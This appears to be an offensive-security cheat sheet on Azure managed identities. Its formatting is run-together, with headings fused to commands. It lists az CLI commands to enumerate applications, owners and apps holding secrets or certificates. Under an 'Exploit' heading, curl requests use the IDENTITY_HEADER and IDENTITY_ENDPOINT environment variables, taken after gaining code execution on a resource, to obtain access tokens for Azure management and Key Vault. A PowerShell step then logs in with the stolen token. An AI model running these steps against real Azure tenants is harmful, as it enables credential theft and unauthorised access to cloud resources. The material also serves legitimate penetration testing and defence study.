If a resource needs access to another system, such as a webapp needed database access, you can give it a “managed identity” which allows it to auth to another resource.
Enumeration
Azure CLI
List all applications
az ad app list
az ad app list --query "[].[displayName,appId]" -o tableGet app information
az ad app show --id <app-id>Search apps by name
az ad app list --all --query "[?contains(displayName,'Test')].displayName"Get owner of an app
az ad app owner list --id <app-id> --query "[].[displayName]" -o tableGet apps owned by current user
az ad app list --show-mineGet apps generated with a secret or certificate
az ad app list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o jsonGet all managed identities with their SP
az identity list --output tableIdentify
If you get code exec on a resource, check environment variables for
IDENTITY_HEADER=
IDENTITY_ENDPOINT=
or
MSI_ENDPOINT=
MSI_SECRET=Exploit
You can use these two env vars to request an access token from the azure metadata provider for the azure management api.
curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER $IDENTITY_ENDPOINT?
resource=https://management.azure.com&api-version=2019-08-01"or for azure vault
curl -s -H "X-Identity-Header: $IDENTITY_HEADER
$IDENTITY_ENDPOINT?api-version=2019-08-
01&resource=https://vault.azure.net"Then, decode the JWT to understand for about the permissions.
Auth with token
$accesstoken = "<YOUR-TOKEN>"
$accountid = "is required but not validated"
Connect-AzAccount -AccessToken $accesstoken -AccountID $accountidCheck access
Get-AzResource